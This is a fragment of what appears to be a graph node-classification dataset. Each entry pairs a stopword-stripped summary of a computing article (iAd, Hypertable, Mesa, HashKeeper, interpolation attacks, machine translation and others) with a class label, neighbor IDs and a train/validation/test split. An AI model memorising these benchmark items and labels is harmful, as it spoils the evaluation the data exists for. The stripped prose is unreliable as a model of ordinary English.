      5078,
      9689,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      6133,
      5622,
      5114,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7153,
    "label": 4,
    "text": "Homeland_Open_Security_Technology:homeland open security technology homeland open security technology host five-year 10 million program department homeland security science technology directorate promote creation use open security open-source software united states government military especially areas pertaining computer security proponent david a. wheeler claims open-source security could also extend hardware written documents october 2011 project open source america 2011 government deployment open source award project contracted open technology research consortium consists georgia tech research institute primary center agile technology university texas austin open source software institute open information security foundation project contributed funding towards openssl software foundation open information security foundation october 2012 host hosted open cybersecurity summit washington d.c. one-day summit keynote stewart a. baker former assistant secretary policy department homeland security",
    "neighbors": [
      420,
      7813,
      2558,
      8764
    ],
    "mask": "Test"
  },
  {
    "node_id": 7154,
    "label": 2,
    "text": "IAd:iad iad discontinued mobile advertising platform developed apple inc. iphone ipod touch ipad line mobile devices allowing third-party developers directly embed advertisements applications announced april 8 2010 iad part apple ios 4 originally slated release june 21 2010 actual date changed july 1 2010. iad announced apple june 7 2010 keynote ipad version appearing fall hosted sold apple iad platform expected compete google admob mobile advertising service similar admob iad facilitates integrating advertisements applications sold ios app store user tapped iad banner full-screen advertisement appeared within application unlike ads would send user safari web browser ads promised interactive advertising services users able close time returning left app former apple ceo steve jobs initially indicated apple would retain 40 ad revenue line called industry standard 60 going developers amount paid developers later increased 70 iad expected benefit free applications well iad app network discontinued june 30 2016 since technology lives apple news advertising app store search ads",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      5733,
      8806,
      3691,
      2673,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      8441,
      7420,
      2819,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5619,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7155,
    "label": 1,
    "text": "Hypertable:hypertable hypertable open-source software project implement database management system inspired publications design google bigtable hypertable runs top distributed file system apache hdfs glusterfs cloudstore kosmos file system kfs written almost entirely c++ developers believed significant performance advantages java hypertable software originally developed company zvents 2008 doug judd promoter hypertable january 2009 baidu chinese language search engine became project sponsor version 0.9.2.1 described blog february 2009 development ended march 2016",
    "neighbors": [
      7816,
      11535,
      7983,
      5170,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7156,
    "label": 4,
    "text": "Information_security_awareness:information security awareness information security awareness evolving part information security focuses raising consciousness regarding potential risks rapidly evolving forms information rapidly evolving threats information target human behavior threats matured information increased value attackers increased capabilities expanded broader intentions developed attack methods methodologies acting diverse motives information security controls processes matured attacks matured circumvent controls processes attackers targeted successfully exploited individuals human behavior breach corporate networks critical infrastructure systems targeted individuals unaware information threats may unknowingly circumvent traditional security controls processes enable breach organization response information security awareness maturing cybersecurity business problem dominated agenda chief information officers cio exposing need countermeasures today cyber threat landscape goal information security awareness make everyone aware susceptible opportunities challenges today ’ threat landscape change human risk behaviors create enhance secure organizational culture information security awareness one several key principles information security information security awareness seeks understand enhance human risk behaviors beliefs perceptions information information security also understanding enhancing organizational culture countermeasure rapidly evolving threats example oecd guidelines security information systems networks include nine generally accepted principles awareness responsibility response ethics democracy risk assessment security design implementation security management reassessment context internet type awareness sometimes referred cyber security awareness focus multiple initiatives including u.s. department homeland security national cyber security awareness month president obama 2015 white house summit cybersecurity consumer protection computer based crimes something new us viruses us well 20 years spyware clocked decade since earliest incidents large-scale use phishing traced back least 2003 one reasons researchers agreed upon pace information system evolving expanding security awareness program among employees falling way behind unfortunately however seems rapid adoption online services matched corresponding embrace security culture information security awareness evolving response evolving nature cyber attacks increased targeting personal information cost scale information security breaches furthermore many individuals think security terms technical controls realizing individuals targets behavior increase risks provide countermeasures risks threats determining measuring information security awareness highlighted need accurate metrics response need information security awareness metrics rapidly evolving order understand measure human threat landscape measure change human understanding behavior measure reduce organizational risk measure effectiveness cost information security awareness countermeasure organizations want invest money information security survey conducted pricewaterhousecoopers 2014 found current employees 31 former employees 27 still contribute information security incidents survey results indicated number actual incidents attributable employees risen 25 since 2013 survey security awareness program best solution organization adopt reduce security threats caused internal employees security awareness program helps employees understand information security individual ’ responsibility responsibility everyone program also explicitly mentions employees responsible activities performed identifications furthermore program enforces standard ways handling business computers although organizations adopted standard way providing security awareness program good program include awareness data network user conduct social media use mobile devices wifi phishing emails social engineering different types viruses malware effective employee security awareness program make clear everyone organization responsible security auditors pay close attention six areas covered program data networks user conduct social media mobile devices social engineering many organizations make privacy policies complicated diverse employees always fail understand regulations privacy policy something reminded employees whenever login business computer privacy policies clearer shorter standardized enable better comprehension comparison privacy practices organizations create interactive sessions employees attend every week speak security threats interactive sessions may include awareness newer threats best practices questions answers security awareness program may beneficial organization penalize violators employees found guilty violating program reported higher executives action otherwise program effective information security authorities may perform gap analysis find deficiencies program early 2015 cios rated information security awareness related issues top strategic priorities example february 2015 wall street journal cio network event convened create prioritized set recommendations drive business policy coming year consensus seemed form around cybersecurity delivering change effective communication rest business information security awareness high-profile breaches forefront organization agenda recent study 220 security awareness officers lance spritzner uncovered three related key findings first executive financial support necessary successful security awareness program second due technical nature traditional security controls countermeasures soft skills necessary understand change human behavior lacking finally terms maturity model security awareness still infancy effectively measuring human risk behavior difficult risky behaviors beliefs perceptions often unknown addition attacks phishing social engineering incidents data leakage sensitive data posted social media sites even breaches go undetected unknown making difficult determine measure points failure often attacks incidents breaches reacted reported outside compromised organization attackers covered tracks thus researched measured proactively addition malicious traffic often goes unnoticed attackers often spy mimic known behavior order prevent intrusion detection access monitoring alerts 2016 study developed method measuring security awareness specifically measured understanding circumventing security protocols disrupting intended functions systems collecting valuable information getting caught p. 38 researchers created method could distinguish experts novices people organize different security scenarios groups experts organize scenarios based centralized security themes novices organize scenarios based superficial themes simulated phishing campaigns run regularly provide measures user compliance",
    "neighbors": [
      4448,
      7084,
      10102,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7157,
    "label": 1,
    "text": "Liquibase:liquibase liquibase open-source database-independent library tracking managing applying database schema changes started 2006 allow easier tracking database changes especially agile software development environment changes database stored text files xml yaml json sql identified combination id author tag well name file list applied changes stored database consulted database updates determine new changes need applied result database version number approach allows work environments multiple developers code branches liquibase automatically creates databasechangelog table databasechangeloglock table first execute changelog file datical largest contributor liquibase project developer datical db – commercial product provides core liquibase functionality plus additional features datical db used dbas release managers devops teams application owners architects developers involved application release process manages database schema changes together application code programmatic fashion eliminates errors delays enables rapid agile releases datical db builds upon liquibase data model approach managing data structure specific content across application versions advance development test production environments datical previews impact schema changes environment deployment thus mitigating risk resulting smoother faster application changes liquibase developer nathan voxland executive datical",
    "neighbors": [
      5612,
      5677,
      3768,
      7983,
      10413,
      4919,
      1816,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 7158,
    "label": 9,
    "text": "Mesa_(programming_language):mesa programming language mesa programming language developed late 1970s xerox palo alto research center palo alto california united states language name pun based upon programming language catchphrases time mesa high level programming language mesa algol-like language strong support modular programming every library module least two source files definitions file specifying library interface plus one program files specifying implementation procedures interface use library program higher-level library must import definitions mesa compiler type-checks uses imported entities combination separate compilation type-checking unusual time mesa introduced several innovations language design implementation notably handling software exceptions thread synchronization incremental compilation mesa developed xerox alto one first personal computers graphical user interface however alto system software written bcpl mesa system programming language later xerox star workstations globalview desktop environment xerox parc later developed cedar superset mesa mesa cedar major influence design important languages modula-2 java important vehicle development dissemination fundamentals guis networked environments advances xerox contributed field computer science mesa originally designed computer systems laboratory csl branch xerox palo alto research center alto experimental micro-coded workstation initially spread confined parc universities xerox donated altos mesa later adopted systems programming language xerox commercial workstations xerox 8010 xerox star dandelion xerox 6085 daybreak particular pilot operating system secondary development environment called xerox development environment xde allowed developers debug operating system pilot well viewpoint gui applications using world swap mechanism allowed entire state world swapped allowed low level system crashes paralyzed whole system debugged technique scale well large application images several megabytes pilot/mesa world later releases moved away world swap view micro-coded machines phased favor sparc workstations intel pcs running mesa princops emulator basic hardware instruction set mesa compiled stack-machine language purportedly highest code density ever achieved roughly 4 bytes per high-level language statement touted 1981 paper implementors xerox systems development department development arm parc tuned instruction set published paper resultant code density mesa taught via mesa programming course took people wide range technology xerox available time ended programmer writing hack workable program designed useful actual example hack bwsmagnifier written 1988 allowed people magnify sections workstation screen defined resizable window changeable magnification factor trained mesa programmers xerox well versed fundamental guis networking exceptions multi-threaded programming almost decade became standard tools trade within xerox mesa eventually superseded cedar programming language many mesa programmers developers left xerox 1985 went dec systems research center used experience mesa design modula-2+ later modula-3 mesa strongly typed programming language type-checking across module boundaries enough flexibility type system heap allocators could written mesa strict separation interface implementation mesa allows true incremental compilation encourages architecture- platform-independent programming also simplified source-level debugging including remote debugging via ethernet mesa rich exception handling facilities four types exceptions support thread synchronization via monitors mesa first language implement monitor broadcast concept introduced pilot operating system mesa imperative algebraic syntax based algol pascal rather bcpl c instance compound commands indicated keywords rather braces mesa keywords written uppercase due peculiarity ascii variant used parc alto character set included left-pointing arrow ← rather underscore result alto programmers including using mesa smalltalk etc conventionally used camelcase compound identifiers practice incorporated parc standard programming style hand availability left-pointing arrow allowed use assignment operator originally algol mesa designers wanted implement exception facility hired recent m.s graduate colorado written thesis exception handling facilities algorithmic languages led richest exception facility time primitives language type-safe checks verify full coverage signal handling uncaught exceptions common cause bugs released software xerox parc later developed cedar superset mesa number additions including garbage collection better string support called ropes later native compiler sun sparc workstations importantly cedar contained type-safe subset compiler subset-checking mode ensure deterministic execution memory leaks conformant cedar code mesa precursor programming language cedar cedar main additions garbage collection dynamic types limited form type parameterization special syntax identify type-safe parts multi-module software package",
    "neighbors": [
      512,
      2304,
      11010,
      2179,
      2830,
      6558,
      1952,
      1316,
      428,
      5677,
      11574,
      1213,
      1349,
      7494,
      8262,
      8524,
      9932,
      7775,
      9441,
      10981,
      9330,
      4341,
      1399,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7159,
    "label": 1,
    "text": "Apache_Calcite:apache calcite apache calcite open source framework building databases data management systems includes sql parser api building expressions relational algebra query planning engine framework calcite store data metadata instead allows external data metadata accessed means plug-ins several apache projects use calcite hive uses calcite cost-based query optimization drill kylin use calcite sql parsing optimization samza storm use calcite streaming sql apex phoenix flink projects development use calcite",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      4065,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2544,
      2163,
      6774,
      1913,
      1018
    ],
    "mask": "Train"
  },
  {
    "node_id": 7160,
    "label": 4,
    "text": "HashKeeper:hashkeeper hashkeeper database application value primarily conducting forensic examinations computers somewhat regular basis hashkeeper uses md5 file signature algorithm establish unique numeric identifiers hash values files known good known bad hashkeeper application developed reduce amount time required examine files digital media examiner defines file known good examiner need repeat analysis hashkeeper compares hash values known good files hash values files computer system values match known good files examiner say substantial certainty corresponding files computer system previously identified known good therefore need examined values match known bad files examiner say substantial certainty corresponding files system examined files bad therefore require scrutiny hash match known bad files relieve examiner responsibility verifying file files fact criminal nature created national drug intelligence center ndic —a component united states department justice—in 1996 first large scale source hash values known good known bad files hashkeeper still community effort based upon belief members state national international law enforcement agencies trusted submit properly categorized hash values one first community sources known good hash values united states internal revenue service first source known bad hash values luxembourg police contributed hash values recognized child pornography hashkeeper available free-of-charge law enforcement military government agencies throughout world available public sending freedom information act request ndic 2012 united states budget ndic de-funded closed doors june 16 2012 availability future hashkeeper uncertain hashkeeper overview national drug intelligence center http //www.justice.gov/archive/ndic/ndic-moved.html http //www.nsrl.nist.gov/nsrl-faqs.html faq12",
    "neighbors": [
      2432,
      7968,
      4834,
      5475,
      5284,
      2437,
      7525,
      9319,
      6475,
      11182,
      830,
      3984,
      4049,
      2901,
      4789,
      8635,
      2494
    ],
    "mask": "None"
  },
  {
    "node_id": 7161,
    "label": 4,
    "text": "Interpolation_attack:interpolation attack cryptography interpolation attack type cryptanalytic attack block ciphers two attacks differential cryptanalysis linear cryptanalysis presented block ciphers new block ciphers introduced proven secure differential linear attacks among iterated block ciphers kn-cipher shark cipher however thomas jakobsen lars knudsen showed late 90 ciphers easy break introducing new attack called interpolation attack attack algebraic function used represent s-box may simple quadratic polynomial rational function galois field coefficients determined standard lagrange interpolation techniques using known plaintexts data points alternatively chosen plaintexts used simplify equations optimize attack simplest version interpolation attack expresses ciphertext polynomial plaintext polynomial relative low number unknown coefficients collection plaintext/ciphertext p/c pairs polynomial reconstructed polynomial reconstructed attacker representation encryption without exact knowledge secret key interpolation attack also used recover secret key easiest describe method example let iterated cipher given formula_2 plaintext formula_3 output formula_4 round formula_5 secret formula_4 round key derived secret key formula_7 key schedule formula_8-round iterated cipher formula_9 ciphertext consider 2-round cipher let formula_10 denote message formula_11 denote ciphertext output round 1 becomes output round 2 becomes expressing ciphertext polynomial plaintext yields formula_16 key dependent constants using many plaintext/ciphertext pairs number unknown coefficients polynomial formula_17 construct polynomial example done lagrange interpolation see lagrange polynomial unknown coefficients determined representation formula_17 encryption without knowledge secret key formula_7 considering formula_20-bit block cipher formula_21 possible plaintexts therefore formula_21 distinct formula_23 pairs let formula_24 unknown coefficients formula_17 since require many formula_23 pairs number unknown coefficients polynomial interpolation attack exist formula_27 assume time construct polynomial formula_17 using formula_23 pairs small comparison time encrypt required plaintexts let formula_24 unknown coefficients formula_17 time complexity attack formula_24 requiring formula_24 known distinct formula_23 pairs often method efficient done given formula_8 round iterated cipher block length formula_20 let formula_37 output cipher formula_38 rounds formula_39 express value formula_37 polynomial plaintext formula_10 polynomial ciphertext formula_11 let formula_43 expression formula_37 via formula_10 let formula_46 expression formula_37 via formula_11 polynomial formula_49 obtain computing forward using iterated formula cipher round formula_38 polynomial formula_51 obtain computing backwards iterated formula cipher starting round formula_8 round formula_53 hold formula_55 formula_56 polynomials low number coefficients solve equation unknown coefficients assume formula_49 expressed formula_58 coefficients formula_51 expressed formula_60 coefficients would need formula_61 known distinct formula_23 pairs solve equation setting matrix equation however matrix equation solvable multiplication addition make sure get unique non-zero solution set coefficient corresponding highest degree one constant term zero therefore formula_63 known distinct formula_23 pairs required time complexity attack formula_63 requiring formula_63 known distinct formula_23 pairs meet-in-the-middle approach total number coefficients usually smaller using normal method makes method efficient since less formula_23 pairs required also use interpolation attack recover secret key formula_7 remove last round formula_8-round iterated cipher block length formula_20 output cipher becomes formula_72 call cipher reduced cipher idea make guess last round key formula_73 decrypt one round obtain output formula_74 reduced cipher verify guess use interpolation attack reduced cipher either normal method meet-in-the-middle method done normal method express output formula_74 reduced cipher polynomial plaintext formula_10 call polynomial formula_77 express formula_17 formula_24 coefficients using formula_24 known distinct formula_23 pairs construct polynomial verify guess last round key check one extra formula_23 pair holds yes high probability guess last round key correct make another guess key meet-in-the-middle method express output formula_37 round formula_39 polynomial plaintext formula_10 polynomial output reduced cipher formula_74 call polynomials formula_49 formula_89 let expressed formula_58 formula_60 coefficients respectively formula_92 known distinct formula_23 pairs find coefficients verify guess last round key check one extra formula_23 pair holds yes high probability guess last round key correct make another guess key found correct last round key continue similar fashion remaining round keys secret round key length formula_20 formula_21 different keys probability formula_98 correct chosen random therefore average make formula_99 guesses finding correct key hence normal method average time complexity formula_100 requiring formula_101 known distinct formula_102 pairs meet-in-the-middle method average time complexity formula_103 requiring formula_104 known distinct formula_102 pairs meet-in-the-middle attack used variant attack s-boxes uses inverse function formula_20-bit s-box formula_107 formula_108 block cipher shark uses sp-network s-box formula_109 cipher resistant differential linear cryptanalysis small number rounds however broken 1996 thomas jakobsen lars knudsen using interpolation attack denote sharkformula_110 version shark block size formula_111 bits using formula_24 parallel formula_20-bit s-boxes formula_8 rounds jakobsen knudsen found exist interpolation attack sharkformula_115 64-bit block cipher using formula_116 chosen plaintexts interpolation attack sharkformula_117 128-bit block cipher using formula_118 chosen plaintexts also thomas jakobsen introduced probabilistic version interpolation attack using madhu sudan algorithm improved decoding reed-solomon codes attack work even algebraic relationship plaintexts ciphertexts holds fraction values",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9156,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      11119,
      881,
      1654,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 7162,
    "label": 2,
    "text": "SMF_120.9:smf 120.9 smf 120 subtype 9 new smf record made available ibm websphere application server z/os version 7 design based customer feedback regarding data required operating z/os previous z/os smf records subtypes 1 3 5 6 7 8 subtypes continue exist subtype 9 may viewed replacement shorthand way referring smf 120 subtype 9 smf 120.9 smf 120.9 provided address two shortcomings previous smf design z/os smf 120.9 activity record based per request design longer need correlate data points across records determine statistical information per request information contained smf 120.9 record contains data request overhead turning smf 120.9 measured approximately 1.5 system cpu basic activity records smf 120.9 record divided ten sections section number fields containing specific information request sections optional may turned based administrator need information ibm information center link referenced mapping sections data fields description data represents wp101342 techdoc referenced extensive description feature written architect developer new function z/os operating system allows started tasks modified operator command allows behavior started task dynamically altered degree modification permitted function started task program limits environment format modify command codice_1 z/os modify issued controller jobname smf 120.9 function z/os supports modify command following parameters sample java program available evaluate dumped smf 120.9 records provide detailed summary view information contain may obtained link registration required sample smf browser called intended replacement powerful smf record analysis products useful seeing format records verifying records written smaller scale analysis br",
    "neighbors": [
      4906,
      3323,
      9838
    ],
    "mask": "None"
  },
  {
    "node_id": 7163,
    "label": 2,
    "text": "System_Information_(Mac):system information mac system information previously known system profiler software utility derived field service diagnostics produced apple service diagnostic engineering team time located apple satellite buildings campbell california bundled classic mac os since mac os 7.6 name apple system profiler mac os x v10.0 first release macos renamed system profiler release mac os x 10.7 lion renamed system information new features lion ability look support information user hardware model well os x mountain lion later versions macos users also access system information holding option key system information ... replace mac apple menu compiles technical information installed hardware devices drivers applications system settings system software programs kernel extensions installed host computer export information plain text rtf plist xml format information used diagnose problems system profiler extremely useful attempting diagnose hardware problem user send information directly apple user desires support scripting automation applescript limited support automator system information also accessed using system_profiler command terminal application information execute man system_profiler system_profiler -h macos terminal application",
    "neighbors": [
      1542,
      4615,
      3598,
      5647,
      1042,
      6700,
      4657,
      1074,
      1592,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      3167,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      213,
      9430,
      3289,
      4318,
      231,
      6377,
      9451,
      4844,
      2288,
      7928,
      8441,
      3324,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      5520,
      9109,
      1439,
      6048,
      11171,
      8114,
      6093,
      7118,
      3035,
      4571,
      479,
      4068,
      5093,
      9700,
      487,
      10221,
      5619,
      11257
    ],
    "mask": "None"
  },
  {
    "node_id": 7164,
    "label": 0,
    "text": "Machine_translation:machine translation machine translation sometimes referred abbreviation mt confused computer-aided translation machine-aided human translation maht interactive translation sub-field computational linguistics investigates use software translate text speech one language another basic level mt performs simple substitution words one language words another alone usually produce good translation text recognition whole phrases closest counterparts target language needed solving problem corpus statistical neural techniques rapidly growing field leading better translations handling differences linguistic typology translation idioms isolation anomalies current machine translation software often allows customization domain profession weather reports improving output limiting scope allowable substitutions technique particularly effective domains formal formulaic language used follows machine translation government legal documents readily produces usable output conversation less standardised text improved output quality also achieved human intervention example systems able translate accurately user unambiguously identified words text proper names assistance techniques mt proven useful tool assist human translators limited number cases even produce output used e.g. weather reports progress potential machine translation debated much history since 1950s number scholars questioned possibility achieving fully automatic machine translation high quality first notably yehoshua bar-hillel critics claim in-principle obstacles automating translation process idea machine translation may traced back 17th century 1629 rené descartes proposed universal language equivalent ideas different tongues sharing one symbol field machine translation appeared warren weaver memorandum translation 1949 first researcher field yehosha bar-hillel began research mit 1951 georgetown university mt research team followed 1951 public demonstration georgetown-ibm experiment system 1954 mt research programs popped japan russia 1955 first mt conference held london 1956 researchers continued join field association machine translation computational linguistics formed u.s. 1962 national academy sciences formed automatic language processing advisory committee alpac study mt 1964 real progress much slower however alpac report 1966 found ten-year-long research failed fulfill expectations funding greatly reduced according 1972 report director defense research engineering ddr e feasibility large-scale mt reestablished success logos mt system translating military manuals vietnamese conflict french textile institute also used mt translate abstracts french english german spanish 1970 brigham young university started project translate mormon texts automated translation 1971 xerox used systran translate technical manuals 1978 beginning late 1980s computational power increased became less expensive interest shown statistical models machine translation various mt companies launched including trados 1984 first develop market translation memory technology 1989 first commercial mt system russian english german-ukrainian developed kharkov state university 1991 mt web started systran offering free translation small texts 1996 followed altavista babelfish racked 500,000 requests day 1997 franz josef och future head translation development google darpa speed mt competition 2003 innovations time included moses open-source statistical mt engine 2007 text/sms translation service mobiles japan 2008 mobile phone built-in speech-to-speech translation functionality english japanese chinese 2009 recently google announced google translate translates roughly enough text fill 1 million books one day 2012 idea using digital computers translation natural languages proposed early 1946 a. d. booth possibly others warren weaver wrote important memorandum translation 1949 georgetown experiment means first application demonstration made 1954 apexc machine birkbeck college university london rudimentary translation english french several papers topic published time even articles popular journals example article cleave zacharov september 1955 issue wireless world similar application also pioneered birkbeck college time reading composing braille texts computer human translation process may described behind ostensibly simple procedure lies complex cognitive operation decode meaning source text entirety translator must interpret analyse features text process requires in-depth knowledge grammar semantics syntax idioms etc. source language well culture speakers translator needs in-depth knowledge re-encode meaning target language therein lies challenge machine translation program computer understand text person create new text target language sounds written person general application beyond current technology though works much faster automated translation program procedure human participation produce output even close quality human translator produce however provide general though imperfect approximation original text getting gist process called gisting sufficient many purposes including making best use finite expensive time human translator reserved cases total accuracy indispensable problem may approached number ways evolution accuracy improved machine translation use method based linguistic rules means words translated linguistic way – suitable orally speaking words target language replace ones source language often argued success machine translation requires problem natural language understanding solved first generally rule-based methods parse text usually creating intermediary symbolic representation text target language generated according nature intermediary representation approach described interlingual machine translation transfer-based machine translation methods require extensive lexicons morphological syntactic semantic information large sets rules given enough data machine translation programs often work well enough native speaker one language get approximate meaning written native speaker difficulty getting enough data right kind support particular method example large multilingual corpus data needed statistical methods work necessary grammar-based methods grammar methods need skilled linguist carefully design grammar use translate closely related languages technique referred rule-based machine translation may used rule-based machine translation paradigm includes transfer-based machine translation interlingual machine translation dictionary-based machine translation paradigms type translation used mostly creation dictionaries grammar programs unlike methods rbmt involves information linguistics source target languages using morphological syntactic rules semantic analysis languages basic approach involves linking structure input sentence structure output sentence using parser analyzer source language generator target language transfer lexicon actual translation rbmt biggest downfall everything must made explicit orthographical variation erroneous input must made part source language analyser order cope lexical selection rules must written instances ambiguity adapting new domains hard core grammar across domains domain-specific adjustment limited lexical selection adjustment transfer-based machine translation similar interlingual machine translation creates translation intermediate representation simulates meaning original sentence unlike interlingual mt depends partially language pair involved translation interlingual machine translation one instance rule-based machine-translation approaches approach source language i.e text translated transformed interlingual language i.e language neutral representation independent language target language generated interlingua one major advantages system interlingua becomes valuable number target languages turned increases however interlingual machine translation system made operational commercial level kant system nyberg mitamura 1992 designed translate caterpillar technical english cte languages machine translation use method based dictionary entries means words translated dictionary statistical machine translation tries generate translations using statistical methods based bilingual text corpora canadian hansard corpus english-french record canadian parliament europarl record european parliament corpora available good results achieved translating similar texts corpora still rare many language pairs first statistical machine translation software candide ibm google used systran several years switched statistical translation method october 2007 2005 google improved internal translation capabilities using approximately 200 billion words united nations materials train system translation accuracy improved google translate similar statistical translation programs work detecting patterns hundreds millions documents previously translated humans making intelligent guesses based findings generally human-translated documents available given language likely translation good quality newer approaches statistical machine translation metis ii presemt use minimal corpus size instead focus derivation syntactic structure pattern recognition development may allow statistical machine translation operate monolingual text corpus smt biggest downfall includes dependent upon huge amounts parallel texts problems morphology-rich languages especially translating languages inability correct singleton errors example-based machine translation ebmt approach proposed makoto nagao 1984 example-based machine translation based idea analogy approach corpus used one contains texts already translated given sentence translated sentences corpus selected contain similar sub-sentential components similar sentences used translate sub-sentential components original sentence target language phrases put together form complete translation hybrid machine translation hmt leverages strengths statistical rule-based translation methodologies several mt organizations claim hybrid approach uses rules statistics approaches differ number ways recently advent neural mt new version hybrid machine translation emerging combines benefits rules statistical neural machine translation approach allows benefitting pre- post-processing rule guided workflow well benefitting nmt smt downside inherent complexity makes approach suitable specific use cases one proponents approach complex use cases omniscien technologies deep learning based approach mt neural machine translation made rapid progress recent years google announced translation services using technology preference previous statistical methods word-sense disambiguation concerns finding suitable translation word one meaning problem first raised 1950s yehoshua bar-hillel pointed without universal encyclopedia machine would never able distinguish two meanings word today numerous approaches designed overcome problem approximately divided shallow approaches deep approaches shallow approaches assume knowledge text simply apply statistical methods words surrounding ambiguous word deep approaches presume comprehensive knowledge word far shallow approaches successful claude piron long-time translator united nations world health organization wrote machine translation best automates easier part translator job harder time-consuming part usually involves extensive research resolve ambiguities source text grammatical lexical exigencies target language require resolved ideal deep approach would require translation software research necessary kind disambiguation would require higher degree ai yet attained shallow approach simply guessed sense ambiguous english phrase piron mentions based perhaps kind prisoner-of-war camp often mentioned given corpus would reasonable chance guessing wrong fairly often shallow approach involves ask user ambiguity would piron estimate automate 25 professional translator job leaving harder 75 still done human one major pitfalls mt inability translate non-standard language accuracy standard language heuristic statistical based mt takes input various sources standard form language rule-based translation nature include common non-standard usages causes errors translation vernacular source colloquial language limitations translation casual speech present issues use machine translation mobile devices name entities narrow sense refer concrete abstract entities real world including people organizations companies places etc also refers expressing time space quantity 1 july 2011 79.99 named entities occur text analyzed statistical machine translation initial difficulty arises dealing named entities simply identifying text consider list names common particular language illustrate – common names different language also constantly changing named entities recognized machine translator may erroneously translated common nouns would likely affect bleu rating translation would change text human readability also possible identified named entities omitted output translation would also implications text readability message another way deal named entities use transliteration instead translation meaning find letters target language closely correspond name source language attempts incorporate machine translation adding transliteration step translation procedure however attempts still problems even cited worsening quality translation named entities still identified incorrectly words transliterated transliterated n't example southern california first word translated directly second word transliterated however machines would often transliterate treated one entity words like hard machine translators even transliteration component process lack attention issue named entity translation recognized potentially stemming lack resources devote task addition complexity creating good system named entity translation one approach named entity translation transliterate translate words second create do-not-translate list end goal – transliteration opposed translation approaches still rely correct identification named entities however third approach successful named entity translation class-based model method named entities replaced token represent class belong example ted erica would replaced person class token way statistical distribution use person names general analyzed instead looking distributions ted erica individually problem class based model solves probability given name specific language affect assigned probability translation study stanford improving area translation gives examples different probabilities assigned david going walk ankit going walk english target language due different number occurrences name training data frustrating outcome study stanford attempts improve named recognition translation many times decrease bleu scores translation result inclusion methods named entity translation work done utilization multiparallel corpora body text translated 3 languages using methods text translated 2 languages may utilized combination provide accurate translation third language compared one source languages used alone ontology formal representation knowledge includes concepts objects processes etc domain relations stored information linguistic nature one speak lexicon nlp ontologies used source knowledge machine translation systems access large knowledge base systems enabled resolve many especially lexical ambiguities following classic examples humans able interpret prepositional phrase according context use world knowledge stored lexicons machine translation system initially would able differentiate meanings syntax change large enough ontology source knowledge however possible interpretations ambiguous words specific context reduced areas usage ontologies within nlp include information retrieval information extraction text summarization ontology generated pangloss knowledge-based machine translation system 1993 may serve example ontology nlp purposes compiled system provides holy grail fully automatic high-quality machine translation unrestricted text many fully automated systems produce reasonable output quality machine translation substantially improved domain restricted controlled despite inherent limitations mt programs used around world probably largest institutional user european commission project example coordinated university gothenburg received 2.375 million euros project support eu create reliable translation tool covers majority eu languages development mt systems comes time budget cuts human translation may increase eu dependency reliable mt programs european commission contributed 3.072 million euros via isa programme creation mt ec statistical machine translation program tailored administrative needs eu replace previous rule-based machine translation system 2005 google claimed promising results obtained using proprietary statistical machine translation engine statistical translation engine used google language tools arabic english chinese english overall score 0.4281 runner-up ibm bleu-4 score 0.3954 summer 2006 tests conducted national institute standards technology recent focus terrorism military sources united states investing significant amounts money natural language engineering in-q-tel venture capital fund largely funded us intelligence community stimulate new technologies private sector entrepreneurs brought companies like language weaver currently military community interested translation processing languages like arabic pashto dari within languages focus key phrases quick communication military members civilians use mobile phone apps information processing technology office darpa hosts programs like tides babylon translator us air force awarded 1 million contract develop language translation technology notable rise social networking web recent years created yet another niche application machine translation software – utilities facebook instant messaging clients skype googletalk msn messenger etc – allowing users speaking different languages communicate machine translation applications also released mobile devices including mobile telephones pocket pcs pdas etc due portability instruments come designated mobile translation tools enabling mobile business networking partners speaking different languages facilitating foreign language learning unaccompanied traveling foreign countries 